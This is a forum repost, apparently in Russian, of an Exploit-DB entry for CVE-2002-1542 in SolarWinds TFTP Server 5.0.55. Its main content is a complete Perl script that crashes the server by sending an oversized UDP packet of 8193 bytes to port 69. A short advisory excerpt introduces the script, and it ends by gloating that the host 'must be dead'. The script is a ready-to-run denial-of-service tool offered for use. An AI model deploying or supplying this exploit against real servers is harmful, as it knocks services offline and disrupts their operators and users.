Exploit SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21963
Проверка EDB
  1. Пройдено
Автор
D4RKGR3Y
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2002-1542
Дата публикации
2002-10-24
Код:
#source: https://www.securityfocus.com/bid/6043/info
#
#A problem in SolarWinds TFTP Server may result in a denial of service, and may have other ramifications. SolarWinds TFTP Server is distributed for the Microsoft Windows platform.
#
#Under some circumstances, it may be possible to crash a vulnerable TFTP server. By sending a UDP packet to the server that is 8193 or more bytes, the server becomes unstable. It has been reported that doing this can consistently reproduce a crash of the server, requiring a manual restart to resume normal operation. 
#
#

#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "vulnerable_host";
$port = "69";
$data = "q";
$num = "8193";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";
$ipaddr = inet_aton($host);
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
print "Now, '$host' must be dead :)\n";

#EOF
 
Источник
www.exploit-db.com

Похожие темы